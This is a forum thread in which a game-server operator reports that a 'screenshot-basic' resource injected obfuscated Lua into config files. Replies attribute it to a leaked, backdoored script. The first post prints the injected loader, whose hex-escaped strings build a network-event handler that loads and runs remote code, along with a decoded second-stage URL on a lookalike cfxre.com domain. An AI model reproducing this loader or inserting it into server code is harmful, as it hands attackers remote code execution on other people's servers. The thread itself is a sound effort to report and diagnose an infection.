Screenshot-basic BACKDOOR

mindkind · January 24, 2023, 1:11am

when i run screenshot-basic it inject some code in random file and when decoded its a cfxre.com url

./server-data/afterlifev4/txData/CFXDefault_928DAD.base/resources/[qs]/[smartphone]/qs-smartphone/config/config_uber.lua:local OMBrqKfTPblmDAxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS = {“\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74”,“\x68\x65\x6c\x70\x43\x6f\41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72”,“\x61\x73\x73\x65\x72\x74”,“\x6c\x6f\x61\x64”,_G} OMBrqKfTPblmDAwVxIMXAONxVlxFoaICmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[1] OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6][OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrAebAdQjqpUwbeLnYshnS[3]](OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[2], function(wYAzlvEkhgSLEgEYhlaMxHwKJUipUEtrEVvXVJuEYUDBQDPfsFjiMKkMjH) OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANbAdQjqpUwbeLnYshnS[4]() end)
Binary file ./server-data/afterlifev4/txData/CFXDefault_928DAD.base/resources/[qs]/qs-core/server/functions.lua matches
./server/alpine/opt/cfx-server/citizen/system_resources/monitor/resource/menu/vendor/freecam/config.lua:local OMBrqKfTPblmDAwVxIMXAONxVlxFoaICmrcUeTZebAdQjqpUwbeLnYshnS = {“\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74”,“\x68\x65\x6c\x70\x43\x6f\x64\x65”,“\x41\x66\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72”,“\x61\x73\x73\x65\x72\x74”,“\x6c\x6f\x61\x64”,_G} OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[1] OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6][OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQnS[3]](OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[2], function(wYAzlvEkhgSLEgEYhlaMxHwKJUipUEtrEJiefDzHgFzgMVvXVJjiMKkMjH) OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjS[4]() end)

the url decoded : https://cfxre.com/v2_/stage3b.php?asf=MlIrVFIvVWx6R3J0N1Vod2pGTi9jSzgxbnlYZlYrdm5PTlBJK1Nrd0NJODBiZ3hTTnpsSUhPcDJMWUVKRTdqdA==

ChieF-TroN · January 24, 2023, 7:05am

It appears you probably got your server infected with a stolen/leaked resource that has a backdoor in it. That is not normal behavior, and I have qs-smartphone as well, and it doesn’t do those things.

Also, cfxre.com is not a fivem domain to my knowledge. As it would be either cfx.re or fivem.net

Gameadictive · April 22, 2023, 4:31pm

Is the screenshot-basic probably not the good link and u get one with this backdoor.

ItsOnlyWaifu · May 1, 2023, 6:00pm

So typical, Honest your best bet is to start over, And stop using leaked scripts of some dodgy website,
Not worth the risk or hassle or time trying to disinfect the scripts, and let this be a lesson learned why not to use leaks scripts.